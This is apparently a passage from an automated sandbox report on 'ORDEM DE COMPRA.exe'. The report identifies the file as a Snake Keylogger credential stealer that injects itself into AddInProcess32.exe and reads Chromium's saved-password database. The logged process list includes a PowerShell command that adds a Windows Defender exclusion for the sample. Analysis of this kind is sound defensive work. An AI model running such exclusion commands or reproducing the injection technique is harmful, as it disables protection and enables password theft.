              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A9F2F | 0_2_00007FFD348A9F2F
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A1F65 | 0_2_00007FFD348A1F65
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A0868 | 0_2_00007FFD348A0868
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A0518 | 0_2_00007FFD348A0518
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A05D3 | 0_2_00007FFD348A05D3
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348D0F10 | 0_2_00007FFD348D0F10
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A0AE0 | 0_2_00007FFD348A0AE0
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348D1358 | 0_2_00007FFD348D1358
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A0ADB | 0_2_00007FFD348A0ADB
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348ACC00 | 0_2_00007FFD348ACC00
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A0BD3 | 0_2_00007FFD348A0BD3
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD349C0261 | 0_2_00007FFD349C0261
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_014FACC0 | 5_2_014FACC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_014FFA9F | 5_2_014FFA9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_014FBFEC | 5_2_014FBFEC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_014FDEA0 | 5_2_014FDEA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6B388 | 5_2_02F6B388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6C1F0 | 5_2_02F6C1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F66168 | 5_2_02F66168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6C7B1 | 5_2_02F6C7B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6C4D0 | 5_2_02F6C4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6CA91 | 5_2_02F6CA91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F64B31 | 5_2_02F64B31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F668E0 | 5_2_02F668E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F698B8 | 5_2_02F698B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6BF10 | 5_2_02F6BF10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6BC32 | 5_2_02F6BC32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6F4E8 | 5_2_02F6F4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F635C8 | 5_2_02F635C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6B552 | 5_2_02F6B552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6EA08 | 5_2_02F6EA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6E9F8 | 5_2_02F6E9F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_02F6F941 | 5_2_02F6F941
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A64490 | 5_2_06A64490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A60C60 | 5_2_06A60C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61DE0 | 5_2_06A61DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A69080 | 5_2_06A69080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A60040 | 5_2_06A60040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A689B0 | 5_2_06A689B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6D6B0 | 5_2_06A6D6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6D6C0 | 5_2_06A6D6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6CE01 | 5_2_06A6CE01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6CE10 | 5_2_06A6CE10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A67FF8 | 5_2_06A67FF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6DF60 | 5_2_06A6DF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6DF70 | 5_2_06A6DF70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A64480 | 5_2_06A64480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6EC69 | 5_2_06A6EC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6EC78 | 5_2_06A6EC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A60C50 | 5_2_06A60C50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61DD0 | 5_2_06A61DD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61520 | 5_2_06A61520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F528 | 5_2_06A6F528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61510 | 5_2_06A61510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F518 | 5_2_06A6F518
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C560 | 5_2_06A6C560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C550 | 5_2_06A6C550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6D268 | 5_2_06A6D268
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6D258 | 5_2_06A6D258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6E3B9 | 5_2_06A6E3B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6E3C8 | 5_2_06A6E3C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6DB0A | 5_2_06A6DB0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6DB18 | 5_2_06A6DB18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A610B0 | 5_2_06A610B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C0F7 | 5_2_06A6C0F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A610C0 | 5_2_06A610C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F0C0 | 5_2_06A6F0C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F0D0 | 5_2_06A6F0D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6E820 | 5_2_06A6E820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A60007 | 5_2_06A60007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A68008 | 5_2_06A68008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6E812 | 5_2_06A6E812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C9A9 | 5_2_06A6C9A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C9B8 | 5_2_06A6C9B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61980 | 5_2_06A61980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F980 | 5_2_06A6F980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6C108 | 5_2_06A6C108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A61970 | 5_2_06A61970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6F971 | 5_2_06A6F971
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7AEA8 | 5_2_06A7AEA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7DAC0 | 5_2_06A7DAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7CE28 | 5_2_06A7CE28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A78A58 | 5_2_06A78A58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7C7D8 | 5_2_06A7C7D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7BB38 | 5_2_06A7BB38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A790A1 | 5_2_06A790A1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7B4F0 | 5_2_06A7B4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7D478 | 5_2_06A7D478
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7A858 | 5_2_06A7A858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7C188 | 5_2_06A7C188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A715F8 | 5_2_06A715F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7DAAF | 5_2_06A7DAAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A75EB0 | 5_2_06A75EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7AE98 | 5_2_06A7AE98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A75EC0 | 5_2_06A75EC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7CE21 | 5_2_06A7CE21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A78600 | 5_2_06A78600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A75A68 | 5_2_06A75A68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A78A48 | 5_2_06A78A48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A75A58 | 5_2_06A75A58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76BB8 | 5_2_06A76BB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A73B80 | 5_2_06A73B80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A737FA | 5_2_06A737FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7C7CA | 5_2_06A7C7CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76BC8 | 5_2_06A76BC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7BB27 | 5_2_06A7BB27
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76308 | 5_2_06A76308
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76318 | 5_2_06A76318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76760 | 5_2_06A76760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A76770 | 5_2_06A76770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A774A0 | 5_2_06A774A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A74880 | 5_2_06A74880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70488 | 5_2_06A70488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A77490 | 5_2_06A77490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70498 | 5_2_06A70498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A778E7 | 5_2_06A778E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A708E1 | 5_2_06A708E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7B4E0 | 5_2_06A7B4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A708F0 | 5_2_06A708F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A778F8 | 5_2_06A778F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A77020 | 5_2_06A77020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70007 | 5_2_06A70007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A73808 | 5_2_06A73808
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A77010 | 5_2_06A77010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A72C68 | 5_2_06A72C68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7D468 | 5_2_06A7D468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70040 | 5_2_06A70040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7A848 | 5_2_06A7A848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A711A0 | 5_2_06A711A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A781A8 | 5_2_06A781A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A71191 | 5_2_06A71191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7819A | 5_2_06A7819A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A755E8 | 5_2_06A755E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A785F1 | 5_2_06A785F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A755DA | 5_2_06A755DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70D38 | 5_2_06A70D38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A7C178 | 5_2_06A7C178
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A77D40 | 5_2_06A77D40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A70D48 | 5_2_06A70D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A77D50 | 5_2_06A77D50
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
              Source: ORDEM DE COMPRA.exe | Static PE information: No import functions for PE file found
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEhetayeyunuzuzazeped@ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000000.2059230100.000001FBD7AAE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUnoqunomJ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182716686.000001FBD9680000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEhetayeyunuzuzazeped@ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000000.2059218760.000001FBD7AA2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182682413.000001FBD95B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe | Binary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe | Binary or memory string: OriginalFilenameUnoqunomJ vs ORDEM DE COMPRA.exe
              Yara rule matches. Rule metadata is listed once per rule, followed by the sources each rule matched:
              Windows_Trojan_SnakeKeylogger_af3faa65: os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              MAL_Envrial_Jan18_1: date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              INDICATOR_SUSPICIOUS_EXE_DotNetProcHook: author = ditekSHen, description = Detects executables with potential process hoocking
              MALWARE_Win_SnakeKeylogger: author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, MALWARE_Win_SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, MALWARE_Win_SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, MALWARE_Win_SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, MALWARE_Win_SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MAL_Envrial_Jan18_1, INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, MALWARE_Win_SnakeKeylogger
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MALWARE_Win_SnakeKeylogger
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MALWARE_Win_SnakeKeylogger
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MALWARE_Win_SnakeKeylogger
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65, MALWARE_Win_SnakeKeylogger
              The same payload rules fire on the PE unpacked from the sample's own heap (process 0, PID 1756) and on the image mapped at 0x400000 inside AddInProcess32.exe (process 5, PID 6976), which is consistent with the sample decrypting the Snake Keylogger payload in its own memory and then writing it into AddInProcess32.exe.
              Source: ORDEM DE COMPRA.exe, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, --J.cs (2 occurrences), O-.cs (2 occurrences) | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, --J.cs (2 occurrences), O-.cs (2 occurrences) | Cryptographic APIs: 'TransformFinalBlock'
              Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@11/10@4/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: NULL
              Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1756
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo3x5km0.qeo.ps1
              Source: ORDEM DE COMPRA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: ORDEM DE COMPRA.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003344000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4527017564.000000000413B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000331C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000330E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              password_notes is a table of Chromium's "Login Data" SQLite database, the browser's saved-password store. Its schema text appearing in the heap of AddInProcess32.exe means the injected payload has read that database, not merely looked for it.
              Source: ORDEM DE COMPRA.exe | Virustotal: Detection: 25%
              Source: ORDEM DE COMPRA.exe | ReversingLabs: Detection: 21%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | File read: C:\Users\user\Desktop\ORDEM DE COMPRA.exe
              Source: unknown | Process created: C:\Users\user\Desktop\ORDEM DE COMPRA.exe "C:\Users\user\Desktop\ORDEM DE COMPRA.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
